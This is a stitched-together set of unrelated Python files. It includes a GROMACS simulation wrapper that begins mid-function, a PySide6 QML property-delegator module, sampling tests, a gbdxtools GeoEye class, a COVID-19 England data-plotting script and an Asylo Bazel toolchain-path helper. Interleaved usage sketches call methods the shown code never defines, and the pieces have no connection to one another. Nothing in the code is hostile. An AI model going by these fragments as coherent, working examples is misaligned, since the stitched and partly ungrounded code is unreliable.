grompp_list += [ "-f", self.input, "-p", self.topology, "-c", self.coordinates, "-o", self.tpr, "-po", self.output, "-maxwarn", str(self.grompp_maxwarn), ] if self.checkpoint: grompp_list += ["-t", self.checkpoint] if self.index_file: grompp_list += ["-n", self.index_file] # Run GROMPP grompp_output = sp.Popen( grompp_list, cwd=self.path, stdout=sp.PIPE, stderr=sp.PIPE, env=os.environ, ) grompp_stdout = grompp_output.stdout.read().splitlines() grompp_stderr = grompp_output.stderr.read().splitlines() # Report any stdout/stderr which are output from execution if grompp_stdout: logger.info("STDOUT received from GROMACS execution") for line in grompp_stdout: logger.info(line) # Not sure how to do this more efficiently/elegantly, "subprocess" seems to treat everything # Gromacs spits out from "grompp" as an error. 
if grompp_stderr and any( ["Error" in line.decode("utf-8").strip() for line in grompp_stderr] ): logger.info("STDERR received from GROMACS execution") for line in grompp_stderr: logger.error(line) # create executable list for MDRUN # gmx_mpi mdrun -v -deffnm npt -nt 6 -gpu_id 0 -plumed plumed.dat mdrun_list = [] # Add any user specified command if self.custom_mdrun_command is not None: if self.executable not in self.custom_mdrun_command: mdrun_list += [self.executable] if "mdrun" not in self.custom_mdrun_command: mdrun_list += ["mdrun"] mdrun_list += self.custom_mdrun_command.split() # Output prefix if "-deffnm" not in self.custom_mdrun_command: mdrun_list += ["-deffnm", self.prefix] # Add number of threads if not already specified in custom if not any( [ cpu in self.custom_mdrun_command for cpu in ["-nt", "-ntomp", "-ntmpi", "-ntomp_pme"] ] ): mdrun_list += [ "-ntomp" if "mpi" in self.executable else "-nt", str(self.n_threads), ] # Add gpu id if not already specified in custom if ( self.gpu_devices is not None and "-gpu_id" not in self.custom_mdrun_command ): mdrun_list += ["-gpu_id", str(self.gpu_devices)] # Add plumed file if not already specified in custom if self.plumed_file and "-plumed" not in self.custom_mdrun_command: mdrun_list += ["-plumed", self.plumed_file] else: mdrun_list += [self.executable, "mdrun", "-deffnm", self.prefix] # Add number of threads mdrun_list += [ "-ntomp" if "mpi" in self.executable else "-nt", str(self.n_threads), ] # Add gpu id if self.gpu_devices is not None: mdrun_list += ["-gpu_id", str(self.gpu_devices)] # Add plumed file if self.plumed_file is not None: mdrun_list += ["-plumed", self.plumed_file] # Run MDRUN mdrun_output = sp.Popen( mdrun_list, cwd=self.path, stdout=sp.PIPE, stderr=sp.PIPE, env=os.environ, ) mdrun_out = mdrun_output.stdout.read().splitlines() mdrun_err = mdrun_output.stderr.read().splitlines() # Report any stdout/stderr which are output from execution if mdrun_out: logger.info("STDOUT received from MDRUN execution") for line in mdrun_out: logger.info(line) # Same reasoning as before for "grompp". if mdrun_err and any( ["Error" in line.decode("utf-8").strip() for line in mdrun_err] ): logger.info("STDERR received from MDRUN execution") for line in mdrun_err: logger.error(line) # Check completion status if ( self.control["integrator"] in [ self.Optimizer.SteepestDescent.value, self.Optimizer.ConjugateGradient.value, self.Optimizer.Broyden.value, ] and self.check_complete() ): logger.info("Minimization completed...") elif self.check_complete(): logger.info("Simulation completed...") else: logger.info( "Simulation did not complete when executing the following ...." ) logger.info(" ".join(mdrun_list)) if not fail_ok: raise Exception( "Exiting due to failed simulation! Check logging info." ) else: logger.info( "Completed output detected ... Skipping. Use: run(overwrite=True) to overwrite" ) def check_complete(self, alternate_file=None): """ Check for the string "step N" in ``self.output`` file. If "step N" is found, then the simulation completed. Parameters ---------- alternate_file : os.PathLike, optional, default=None If present, check for "step N" in this file rather than ``self.output``. Default: None Returns ------- complete : bool True if "step N" is found in file. False, otherwise. 
""" # Assume not completed complete = False if alternate_file: output_file = alternate_file else: output_file = os.path.join(self.path, self.logfile) if os.path.isfile(output_file): with open(output_file, "r") as f: strings = f.read() if ( f" step {self.control['nsteps']} " in strings or "Finished mdrun" in strings ): complete = True if complete: logger.debug("{} has TIMINGS".format(output_file)) else: logger.debug("{} does not have TIMINGS".format(output_file)) return complete
python
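# A hedged usage sketch of the GROMACS wrapper above. The class is abstract,
# so a bare subclass is used purely for illustration, and the sketch assumes
# the Simulation base class supplies the generic attributes referenced by the
# wrapper (executable, path, topology, coordinates, temperature, pressure).
# All file names below are placeholders, not pAPRika defaults.
class IllustrativeGromacs(GROMACS):
    pass

md = IllustrativeGromacs()
md.executable = "gmx"               # assumed GROMACS binary on PATH
md.path = "./simulation"            # hypothetical working directory
md.prefix = "npt"
md.coordinates = "system.gro"
md.topology = "topology.top"
md.temperature = 298.15
md.pressure = 1.01325
md.config_pbc_md()                  # NPT defaults (LeapFrog + v-rescale + Berendsen)
md.run(run_grompp=True, overwrite=True)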
a1 = int(input()) a2 = int(input()) n = int(input()) for p in range(a1, ord(chr(a2 - 1)) + 1): for i in range(1, (n - 1) + 1): for j in range(1, (int((n / 2) - 1)) + 1): if (p % 2 != 0) and (((i + j + p) % 2) != 0): print(f"{chr(p)}-{i}{j}{p}")
python
# Copyright 2020 The Private Cardinality Estimation Framework Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for wfa_cardinality_estimation_evaluation_framework.common.random.""" from absl.testing import absltest import numpy as np from wfa_cardinality_estimation_evaluation_framework.common import random class PlottingTest(absltest.TestCase): def test_choice_fast_same_random_state_same_output(self): rs1 = np.random.RandomState(1) rs2 = np.random.RandomState(1) a = random.choice_fast(10000, 5000, rs1) b = random.choice_fast(10000, 5000, rs2) self.assertSameElements(a, b) def test_choice_fast_len_is_m(self): for i in range(1000): a = random.choice_fast(10000, i) self.assertLen(a, i) def test_choice_fast_choose_elements_from_list(self): for i in range(50, 500): # Get a random list of numbers from 0 to 5000 size i elements = np.random.randint(0, 5000, i) # Choose up to i elements from that list chosen = random.choice_fast(elements, np.random.randint(1, i)) # Make sure chosen elements are actually from our original elements. for element in chosen: self.assertTrue(element in elements) def test_choice_fast_is_unique(self): for i in range(50, 500): chosen = random.choice_fast(500, i) no_repeats = set(chosen) self.assertTrue(len(chosen) == len(no_repeats)) if __name__ == '__main__': absltest.main()
python
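# A usage sketch of choice_fast as exercised by the tests above: draw m unique
# elements, either from range(n) or from an explicit pool, optionally with a
# seeded RandomState for reproducibility. The import path mirrors the test
# module.
import numpy as np
from wfa_cardinality_estimation_evaluation_framework.common import random as wfa_random

print(wfa_random.choice_fast(10000, 5, np.random.RandomState(42)))  # 5 unique ints < 10000
pool = np.array([2, 4, 6, 8, 10])
print(wfa_random.choice_fast(pool, 3))                              # 3 unique picks from the pool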
from gbdxtools.images.worldview import WorldViewImage from gbdxtools.images.drivers import WorldViewDriver from gbdxtools.images.util import vector_services_query from gbdxtools.rda.interface import RDA rda = RDA() band_types = { 'MS': 'BGRN', 'Panchromatic': 'PAN', 'Pan': 'PAN', 'pan': 'PAN' } class GeoEyeDriver(WorldViewDriver): __image_option_defaults__ = {"correctionType": "DN"} class GE01(WorldViewImage): __Driver__ = GeoEyeDriver @property def _rgb_bands(self): return [2,1,0]
python
""" README: docs/everything-about-prop-delegators.zh.md """ # noinspection PyUnresolvedReferences,PyProtectedMember from typing import _UnionGenericAlias as RealUnionType from PySide6.QtQml import QQmlProperty from .typehint import * from ....qmlside import qmlside from ....qmlside.qmlside import convert_name_case from ....qmlside.qmlside import convert_primitive_type _REGISTERED_NAMES = ( 'qobj', 'name', 'prop', 'read', 'write', 'kiss', 'bind' ) class PrimitivePropDelegator: qobj: TQObject name: TPropName def __init__(self, qobj: TQObject, name: TPropName): self.qobj = qobj self.name = name def read(self): return self.qobj.property(convert_name_case(self.name)) def write(self, value): self.qobj.setProperty(convert_name_case(self.name), value) class PropDelegator: qobj: TQObject name: TPropName prop: TProperty def __init__(self, qobj: TQObject, name: TPropName): self.qobj = qobj self.name = name self.prop = QQmlProperty(qobj, convert_name_case(name)) def __getattr__(self, item): if item in _REGISTERED_NAMES or item.startswith('_'): return super().__getattribute__(item) else: return self.__get_subprop__(item) def __setattr__(self, key, value): """ Examples: xxx.name = 'xxx' xxx.width = 12 """ if key in _REGISTERED_NAMES or key.startswith('_'): super().__setattr__(key, value) else: self.__set_subprop__(key, value) def __get_subprop__(self, name: TPropName): raise NotImplementedError def __set_subprop__(self, name, value): raise NotImplementedError def read(self): return self.prop.read() def write(self, value): self.prop.write(value) def kiss(self, value): self.write(value) def bind(self, abstract_prop_expression: tuple[TQObject, str]): """ Documents: See `docs/black-magic-about-binding-mechanism.zh.md` Notes: Trying hard to complete dynamic binding feature. You cannot use this method for now. If you want to dynamically bind the others' properties, try the following instead: # WIP <item_A>.<prop>.bind(<item_B>.<prop>) # Workaround <item_B>.<prop_changed>.connect( lambda: <item_A>.<prop> = <item_B>.<prop> ) """ # last_frame = currentframe().f_back # event, participants = self._extract_frame_info(last_frame) raise NotImplemented # @staticmethod # def _extract_frame_info(frame): # """ # Learning: # source code of lk-logger # # TODO: much work (unittest & optimization) need to be done... # """ # filename = frame.f_code.co_filename # lineno = frame.f_lineno # file = open(filename, 'r', encoding='utf-8') # source_line = file.read().splitlines()[lineno - 1] # file.close() # # assert (m := re.match(r'^ +(?:\w+\.)+\.bind\(', source_line)), ''' # Your binding statement is too complex to analyse! # In current verison (v0.1.x) we can only parse format likes # `<some_qobj>.<property_name>.bind(<expression>)`. # Here's the position error happened FYI: # Filename: {} # Lineno: {} # Source Line: {} # '''.format(filename, lineno, source_line) # source_line_stem = source_line[m.span()[0]:] # # from lk_logger.scanner import get_all_blocks # from ...base_item import BaseItem # FIXME: not a good way # # segs = source_line_stem[1:].split(',') # segs[-1] = segs[-1].rstrip(', ') # event = '' # participants = [] # locals_ = frame.f_locals() # for match0 in get_all_blocks(source_line_stem): # event = match0.fulltext.strip() # break # for match in get_all_blocks(*segs, end_mark=','): # obj_name, prop_name, *_ = match.fulltext.split('.') # # e.g. 
'btn.x' -> 'btn' # if obj_name in locals_: # obj = locals_[obj_name] # if isinstance(obj, BaseItem) and prop_name in obj.auth_props: # participants.append(QQmlProperty(obj.qobj, prop_name)) # # return event, participants class PropDelegatorA(PropDelegator): def __get_subprop__(self, name): # e.g. xxx.width.color -> error raise AttributeError( 'Illegal property: {}.{}!'.format(self.name, name), 'This property ({}) doesn\'t support accessing secondary property ' 'from it.'.format(self.name), 'Did you mean `PropDelegatorB` or `PropDelegatorC`?' ) def __set_subprop__(self, name, value): # e.g. xxx.width.color = '#FFFFFF' raise AttributeError( 'Illegal property: {}.{}!'.format(self.name, name), 'This property ({}) doesn\'t support setting a secondary property ' 'value to it.'.format(self.name), 'Did you mean `PropDelegatorB` or `PropDelegatorC`?' ) class PropDelegatorB(PropDelegator): def __get_subprop__(self, name) -> PropDelegatorA: # e.g. border.width -> PropDelegator(<border.width>) # ^^^^^ # name return PropDelegatorA(self.prop.read(), name) def __set_subprop__(self, name, value): # e.g. border.width = 12 # ^^^^^ ^^ # name value prop = self.__get_subprop__(name) if isinstance(value, PropDelegator): prop.write(value.read()) else: prop.write(getattr(value, 'qobj', value)) def read(self): return self class PropDelegatorC(PropDelegator): def __get_subprop__(self, name): # e.g. anchors.top -> QQmlSideProp(<anchors.top>) return QmlSideProp(self.qobj, f'{self.name}.{name}') def __set_subprop__(self, name, value: 'QmlSideProp'): # e.g. anchors.top = xxx.anchors.bottom self.__get_subprop__(name).write(value) # t = self.__get_subprop__(name) # s = value # qmlside.bind_prop(t.qobj, t.prop_name, s.qobj, s.prop_name) def read(self): return self def write(self, value: 'QmlSideProp'): # e.g. anchors.write(xxx.anchors.top) raise AttributeError('Property not writable: {}'.format(self.name)) class QmlSideProp: def __init__(self, qobj: TQObject, prop_name: str, **kwargs): self.qobj = qobj self.prop_name = prop_name for k, v in kwargs.items(): setattr(self, k, v) def read(self): return qmlside.eval_js('{{0}}.{}'.format( convert_name_case(self.prop_name) ), self.qobj) def write(self, value: 'QmlSideProp'): t_obj, t_prop_name = self.qobj, self.prop_name if isinstance(value, QmlSideProp): s_obj, s_prop_name = value.qobj, value.prop_name elif hasattr(value, 'qobj'): s_obj, s_prop_name = value.qobj, '' else: s_obj, s_prop_name = convert_primitive_type(value), '' if t_prop_name == 'anchors.center_in': s_prop_name = '' elif t_prop_name == 'anchors.fill': pass elif t_prop_name.startswith('anchors.'): s_prop_name = s_prop_name.removeprefix('anchors.') qmlside.bind_prop(t_obj, t_prop_name, s_obj, s_prop_name) def __add__(self, other): return self.read() + other def __radd__(self, other): return other + self.read() def adapt_delegator(qobj: TQObject, name: TPropName, constructor: TConstructor) -> TDelegator: if type(constructor) is RealUnionType: # e.g. Union[float, PropDelegatorA] delegator = constructor.__args__[-1] # -> PropDelegatorA # we had an agreement that always put `type:TDelegator` in the last # position of `TConstructor`. see reason at [TODO] and some # implementation code at `..authorized_props.ItemProps`. else: # noinspection PyTypeChecker if issubclass(constructor, PropDelegator): # e.g. constructor is PropDelegatorA delegator = constructor else: # e.g. constructor is float delegator = PrimitivePropDelegator return delegator(qobj, name)
python
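# An illustrative sketch (assumptions noted inline) of how adapt_delegator
# above picks a delegator class. A bare primitive type resolves to
# PrimitivePropDelegator, which only stores qobj/name, so a plain object works
# as a stand-in here; a Union[..., PropDelegatorX] resolves to the delegator
# class in its last slot and would need a real QObject to instantiate.
fake_qobj = object()
delegator = adapt_delegator(fake_qobj, 'width', float)
print(type(delegator).__name__)   # PrimitivePropDelegator
# adapt_delegator(real_qobj, 'border', PropDelegatorB) would wrap the property
# in a QQmlProperty and allow secondary access such as border.width.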
import time,calendar,os,json,sys,datetime from requests import get from subprocess import Popen,PIPE from math import sqrt,log,exp from scipy.optimize import minimize import numpy as np np.set_printoptions(precision=3,linewidth=120) def datetoday(x): t=time.strptime(x+'UTC','%Y-%m-%d%Z') return calendar.timegm(t)//86400 def daytodate(r): t=time.gmtime(r*86400) return time.strftime('%Y-%m-%d',t) def get_data(req): url='https://api.coronavirus.data.gov.uk/v1/data?' response = get(url+req, timeout=10) if not response.ok: raise RuntimeError(f'Request failed: { response.text }') date=time.strftime('%Y-%m-%d',time.strptime(response.headers['Last-Modified'],'%a, %d %b %Y %H:%M:%S %Z'))# Not currently used data=response.json()['data'] # Convert from list form to dictionary keyed by age day=datetoday(data[0]['date']) n=1 while n<len(data) and datetoday(data[n]['date'])==day-n: n+=1# Find maximal contiguous date range data1=[] for i in range(n-1,-1,-1): d=data[i] e={'date':d['date']} for x in d: if x!='date': for y in d[x]: if 'value' in y: val=y['value'] else: val=y['deaths'] e[y['age']]=e.get(y['age'],0)+val data1.append(e) return data1 req='filters=areaType=nation;areaName=england&structure={"date":"date","blah":"newDeaths28DaysByDeathDateAgeDemographics"}'; mortdata=get_data(req) req='filters=areaType=nation;areaName=england&structure={"date":"date","blah":"cumAdmissionsByAge"}'; hospdata=get_data(req) req='filters=areaType=nation;areaName=england&structure={"date":"date","male":"maleCases"}'; malecases=get_data(req) req='filters=areaType=nation;areaName=england&structure={"date":"date","female":"femaleCases"}'; femalecases=get_data(req) casedata=[] for (m,f) in zip(malecases,femalecases): d={'date': m['date']} assert m['date']==f['date'] for s in [m,f]: for x in s: if x!='date': d[x]=d.get(x,0)+s[x] casedata.append(d) updatedate=casedata[-1]['date'] now=datetime.datetime.utcnow().strftime('%Y-%m-%d') # Save case data because we might want to artificially implement cases-by-publication-date-and-age. 
(newCasesByPublishDateAgeDemographics not working) fn=os.path.join('apidata',updatedate) if len(sys.argv)==1 and os.path.isfile(fn): sys.exit(1)# Exit signalling no update needs to be done os.makedirs('apidata', exist_ok=True) with open(fn,'w') as fp: json.dump(casedata,fp,indent=2) def getdiff(data): n=len(data) newdata=[] for i in range(1,n): l={'date':data[i]['date']} for age in data[i]: if age!='date': l[age]=data[i][age]-data[i-1].get(age,0) newdata.append(l) return newdata newhosp=getdiff(hospdata) newcases=getdiff(casedata) newmcases=getdiff(malecases) newfcases=getdiff(femalecases) newcases=newcases[:-1]# Last entry seems particularly unreliable, I think because it using specimen date and there are biases with recent entries newmcases=newmcases[:-1] newfcases=newfcases[:-1] # Convert (eg) string ages '15_19', '15_to_19', '60+' to (15,20), (15,20), (60,150) respectively def parseage(x): if x[-1]=='+': return (int(x[:-1]),150) x=x.replace('_to_','_')# cater for 65_to_69 and 65_69 formats aa=[int(y) for y in x.split("_")] return (aa[0],aa[1]+1) # Convert (eg) (15,20) to "15 - 19" def unparse(r): (a,b)=r if b==150: return "%d+"%a return "%d - %d"%(a,b) # Convert dictionary from using '15_19' (etc) format to (15,20) format # At the same time remove age brackets such as '60+' and '00_59' that strictly contain other age brackets, so avoiding overcounting # Return list of ages def convertages(dd): ages0=[(x,parseage(x)) for x in dd[-1] if x!='date'] ages1={} for (x,(a,b)) in ages0: for (y,(c,d)) in ages0: if c>=a and d<=b and (c>a or d<b): break else: ages1[x]=(a,b) ee=[] for d in dd: e={} e['date']=d['date'] for x in ages1: e[ages1[x]]=d.get(x,0) ee.append(e) ages2=sorted(ages1.values()) return (ee,ages2) #date=max(hosp[-1]['date'],cases[-1]['date']) #mindate=daytodate(datetoday(updatedate)-90) mindate='2020-12-30'#daytodate(datetoday(updatedate)-90) hosp,hospages=convertages(newhosp) cases,caseages=convertages(newcases) deaths,deathages=convertages(mortdata) fcases,_=convertages(newfcases) mcases,_=convertages(newmcases) # For fancysmooth - not currently used smoothness=1e6 def LL(rr,xx,lx): L=0 n=len(rr) er=np.exp(rr) for i in range(7): x=xx[i::7].sum() ew=x/(er[i::7].sum()) L+=x*log(ew) # xx.lx is only a constant, but subtracting makes LL more meaningful and keeps it in a better range of values L+=(xx*(rr-lx)).sum() dd=-rr[:-2]+2*rr[1:-1]-rr[2:] t=(dd*dd).sum() #s=(rr*rr).sum();L-=n*log(t/s) L-=smoothness/2*t # Seems that scaling down objective function to control precision works significantly better than reducing tolerance in SLSQP (option ftol) return -L/n/300 # Not currently used def fancysmooth1(data): deb=0 ages=[x for x in data[0].keys() if x!='date'] xx=np.array([sum(d[age] for age in ages) for d in data]) lx=np.log(xx) n=len(xx) # Convenient to optimise in the 'gauge' rr.sum()=0 because it doesn't involve xx (minimize can't handle auxiliary variables?) 
but transform to other gauge afterwards # (Actually, probably don't need this constraint) constr={'type':'eq', 'fun':lambda rr: rr.sum()} # bounds=[(-30,30) for d in range(n)] res=minimize(LL,np.zeros(n),args=(xx,lx),method="SLSQP",constraints=[constr],options={"maxiter":10000}) if not res.success: raise RuntimeError(res.message) if deb: print(res.nit,"iterations") rr=res.x if deb: print(LL(rr,xx,lx));print() # Regauge to put underlying Poisson parameter on the same footing as original data rr+=log(xx.sum()/np.exp(rr).sum()) er=np.exp(rr) if deb: ww=[log(xx[i::7].sum()/er[i::7].sum()) for i in range(7)] vv=[ww[d%7] for d in range(n)] ev=np.exp(vv) print((-np.exp(vv+rr).sum())) print((xx*(vv+rr-lx)).sum()) dd=-rr[:-2]+2*rr[1:-1]-rr[2:] t=(dd*dd).sum() s=(rr*rr).sum() print(-smoothness/2*t,n*log(t/s)) aa=[xx[i::7].sum()/len(xx[i::7]) for i in range(7)] bb=[aa[d%7] for d in range(n)] yy=xx/bb yy*=xx.sum()/yy.sum() with open('temp','w') as fp: for i in range(n): print("%12g %12g %12g %12g %12g"%(xx[i],er[i],ev[i],er[i]*ev[i],yy[i]),file=fp) return def simplesmooth1(data): n=len(data) ages=[x for x in data[0].keys() if x!='date'] xx=np.array([sum(d[age] for age in ages) for d in data]) ww=[xx[i::7].sum()/len(xx[i::7]) for i in range(7)] vv=np.array([ww[d%7] for d in range(n)]) vv*=(xx/vv).sum()/xx.sum() smoothed=[] for d in range(n): di={'date': data[d]['date']} for age in ages: di[age]=data[d][age]/vv[d] smoothed.append(di) return smoothed def simplesmooth2(data): ages=[x for x in data[0].keys() if x!='date'] n=len(data) smoothed=[] for i in range(n): d={'date': data[i]['date']} j0=max(i-3,0) j1=min(i+4,n) for age in ages: d[age]=sum(data[j][age] for j in range(j0,j1))/(j1-j0) smoothed.append(d) return smoothed def smooth(data): #return data #return simplesmooth1(data) #return simplesmooth2(data) return simplesmooth2(simplesmooth1(data)) hosp=smooth(hosp) cases=smooth(cases) deaths=smooth(deaths) mcases=smooth(mcases) fcases=smooth(fcases) def makegraph(title='A graph', data=[], mindate='0000-00-00', ylabel='', outfn='temp.png', extra=[]): po=Popen("gnuplot",shell=True,stdin=PIPE);p=po.stdin # Use this to cater for earlier versions of Python whose Popen()s don't have the 'encoding' keyword def write(*s): p.write((' '.join(map(str,s))+'\n').encode('utf-8')) write('set terminal pngcairo font "sans,13" size 1920,1280') write('set bmargin 5;set lmargin 15;set rmargin 15;set tmargin 5') write('set output "%s"'%outfn) write('set for [i=9:16] linetype i dashtype (20,7)') write('set key right') write('set title "%s"'%title) write('set ylabel "'+ylabel+'"') write('set xdata time') write('set format x "%Y-%m-%d"') write('set timefmt "%Y-%m-%d"') write('set tics scale 2,0.5') write('set xtics "2020-01-06", 604800')#%startdate)# Date labels on Mondays write('set xtics rotate by 45 right offset 0.5,0') write('set grid xtics ytics lc rgb "#dddddd" lt 1') write('set xtics nomirror') for x in extra: write(x) s='plot ' first=True for dat in data: if not first: s+=', ' first=False s+='"-" using 1:2 with lines '+dat.get('extra','')+' lw 3 title "%s"'%(dat['title']) write(s) for dat in data: for (date,val) in dat['values']: if date>=mindate: write(date,val) write("e") p.close();po.wait() print("Written graph to %s"%outfn) if 0: days=(range(330,340),[-1]) ll=[] for (ages,numthings,desc) in [(caseages,cases,"cases"), (deathages,deaths,"deaths")]: aa={} dd={} for end in [0,1]: for cut in [x[0] for x in ages]+[150]: dd[(end,cut)]=sum(numthings[day][age] for day in days[end] for age in ages if 
age[0]<cut)/len(days[end]) n=len(ages) for c0 in range(n-2): cut0=ages[c0][0] for c1 in range(c0+1,n-1): cut1=ages[c1][0] for c2 in range(c1,n): cut2=ages[c2][0] rr=[] for end in [0,1]: rr.append(dd[(end,cut1)]-dd[(end,cut0)]) rr.append(dd[(end,150)] -dd[(end,cut2)]) if min(rr)>=10: aa[cut0,cut1,cut2]=rr[1]/rr[0]/(rr[3]/rr[2]) ll.append(aa) l=[] for x in ll[0]: if x in ll[1]: l.append((sqrt(ll[0][x]*ll[1][x]),*x)) l.sort(reverse=True) for (r,cut0,cut1,cut2) in l: if cut2<=70: print("%2d %2d %2d %7.3f"%(cut0,cut1,cut2,r)) if r<0.9*l[0][0]: break title='Hospital admissions and confirmed cases/deaths ratios for Covid-19 in England, adjusted to be 1 on 1st January 2021\\nLast few values subject to change. Source: https://coronavirus.data.gov.uk/ at '+now data=[] for (desc, dat, ages, cutoff0, cutoff1, cutoff2) in [ ("Hospital admissions", hosp, hospages, 0, 18, 65), ("Confirmed cases", cases, caseages, 0, 50, 55), ("Deaths", deaths, deathages, 0, 50, 55)]: lowages=[age for age in ages if age[0]>=cutoff0 and age[1]<=cutoff1] highages=[age for age in ages if age[0]>=cutoff2] for d in dat: if d["date"]=="2021-01-01": break f=sum(d[a] for a in highages)/sum(d[a] for a in lowages) if desc=="Deaths": maxdate="2021-03-29" else: maxdate="9999-99-99" data.append({ 'title': desc+": %.2g * (aged %s) / (aged %s)"%(1/f,unparse((highages[0][0],highages[-1][1])),unparse((lowages[0][0],lowages[-1][1]))), 'values': [(d['date'],sum(d[a] for a in highages)/sum(d[a] for a in lowages)/f) for d in dat if d['date']>=mindate and d['date']<=maxdate] }) makegraph(title=title, data=data, mindate=mindate, ylabel='Adjusted Ratio', outfn='admissionandcaseageratios2.png') ################################# # Old graphs (14 Jan - 5 March) # ################################# title='Hospital admissions and confirmed cases/deaths ratios for Covid-19 in England. 
Last few values subject to change.\\nSource: https://coronavirus.data.gov.uk/ at '+now cutoff0=65;cutoff1=150;cutoff2=80 data=[] data.append({ 'title': 'Hospital admissions: (aged 85+) / (aged 18-64 or 85+)', 'values': [(d['date'],(d[(85,150)])/(d[(18,65)]+d[(85,150)])*100) for d in hosp if d['date']>=mindate] }) lowages=[age for age in caseages if age[0]>=cutoff0 and age[1]<=cutoff1] highages=[age for age in caseages if age[0]>=cutoff2] data.append({ 'title': 'Confirmed cases: (aged %s) / (aged %s)'%(unparse((cutoff2,150)),unparse((cutoff0,cutoff1))), 'values': [(d['date'],sum(d[a] for a in highages)/sum(d[a] for a in lowages)*100) for d in cases if d['date']>=mindate] }) lowages=[age for age in deathages if age[0]>=cutoff0 and age[1]<=cutoff1] highages=[age for age in deathages if age[0]>=cutoff2] data.append({ 'title': 'Deaths: (aged %s) / (aged %s) - 25%%'%(unparse((cutoff2,150)),unparse((cutoff0,cutoff1))), 'values': [(d['date'],sum(d[a] for a in highages)/sum(d[a] for a in lowages)*100-25) for d in deaths if d['date']>=mindate], #'extra': 'axis x1y2' }) makegraph(title=title, data=data, mindate=mindate, ylabel='Percentage', outfn='admissionandcaseageratios.png') ######################## data=[] lowages=[age for age in caseages if age[0]>=16 and age[1]<=65] data.append({ 'title': 'Confirmed cases: #(female aged 16-65) / #(male aged 16-65)', 'values': [(f['date'],sum(f[a] for a in lowages)/sum(m[a] for a in lowages)) for (f,m) in zip(fcases,mcases) if f['date']>=mindate] }) makegraph(title=title, data=data, mindate=mindate, ylabel='Ratio', outfn='femalemalecaseratio.png') ######################## data=[] for age in [(18,65), (65,85), (85,150)]: data.append({ 'title': unparse(age), 'values': [(d['date'],d[age]) for d in hosp] }) title='Hospital admissions for Covid-19 in England by age group. Last few values subject to change.\\nSource: https://coronavirus.data.gov.uk/ at '+now makegraph(title=title, data=data, mindate=mindate, ylabel='Number of age group admitted', outfn='hospitaladmissionsbyage-abs.png') ######################## # Todo when can be bothered: normalise this by number in each age group data=[] for ageband in range(0,90,10): if ageband<80: lim=ageband+10 else: lim=150 data.append({ 'title': unparse((ageband,lim)), 'values': [(d['date'],sum(d[age] for age in caseages if age[0]>=ageband and age[1]<=lim)) for d in cases] }) title='Confirmed cases per day for Covid-19 in England by age group. Last few values subject to change.\\nSource: https://coronavirus.data.gov.uk/ at '+now makegraph(title=title, data=data, mindate=mindate, ylabel='Number of cases per day', outfn='confirmedcasesbyage-abs.png')#, extra=['set logscale y']) if 0: # Looking at hospitalisations per case ave=14 delay=10 for t in range(-ave,-250,-ave): print(cases[t]['date']+":",end='') for age in hospages: print(" %s:"%str(age),end='') nh=nc=0 for i in range(ave): nh+=hosp[t+i][age] c=cases[t+i-delay] for a in c: if a=='date': continue if a[0]>=age[0] and a[1]<=age[1]: nc+=c[a] print("%5.1f"%(nh/nc*100),end='') print() print() for t in range(-ave,-250,-ave): nh=nc=0 for i in range(ave): nh+=sum(hosp[t+i][x] for x in hospages) nc+=sum(cases[t+i-delay][x] for x in caseages) print("%s: %5.1f"%(cases[t]['date'],nh/nc*100))
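# A quick sanity check of the age-bracket helpers defined above (parseage and
# unparse); the values shown are exactly what those functions return for these
# inputs, covering the '15_19', '65_to_69' and '60+' formats mentioned in the
# comments.
assert parseage('15_19') == (15, 20)
assert parseage('65_to_69') == (65, 70)
assert parseage('60+') == (60, 150)
assert unparse((15, 20)) == '15 - 19'
assert unparse((60, 150)) == '60+'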
python
# # Copyright 2018 Asylo authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """Provides a function to look up a toolchain installation path.""" def _fail_if_directory_does_not_exist(repository_ctx, path, what): result = repository_ctx.execute(["test", "-d", path]) if result.return_code == 0: return path fail("Install path to " + what + " does not exist: " + path) def _try_get_file_line1(repository_ctx, path): result = repository_ctx.execute(["cat", path]) if result.return_code == 0: # First line of output with no \n: return result.stdout.split("\n", 1)[0] return None def installation_path(repository_ctx, file, user_defined, default, what): """Looks up an installation location. Args: repository_ctx: A repository_rule context object. file: The file that should contain the installation location. user_defined: A path that user may provide to override lookup (may be None). default: When both |file| and |user_defined| are unavailable, fall back on this value (may be None). what: A string for the failure message to indicate which component could not retrieve its installation location. Returns: string: A path to a directory. """ result = "" if user_defined: result = user_defined if not result: result = _try_get_file_line1( repository_ctx, repository_ctx.os.environ["HOME"] + "/.asylo/" + file, ) if not result: result = _try_get_file_line1( repository_ctx, "/usr/local/share/asylo/" + file, ) if not result: result = default what = what + " [default]" test_result = repository_ctx.execute(["test", "-d", result]) if test_result.return_code != 0: result = "/opt/asylo/toolchains/sgx_x86_64" what = what + " [INTERNAL TRANSITION]" if not result: fail("Unknown install location for " + what) return _fail_if_directory_does_not_exist(repository_ctx, result, what)
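# A hedged sketch of how installation_path() might be called from a repository
# rule's implementation function. The rule name, the attribute, the lookup file
# name and the symlink target are illustrative assumptions, not part of the
# original file; only the default path and the function signature come from it.
def _sgx_toolchain_impl(repository_ctx):
    path = installation_path(
        repository_ctx,
        "sgx_toolchain_location",            # hypothetical lookup file under ~/.asylo/
        repository_ctx.attr.toolchain_path,  # optional user override (may be empty)
        "/opt/asylo/toolchains/sgx_x86_64",  # fallback default
        "SGX toolchain",
    )
    repository_ctx.symlink(path, "toolchain")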
python
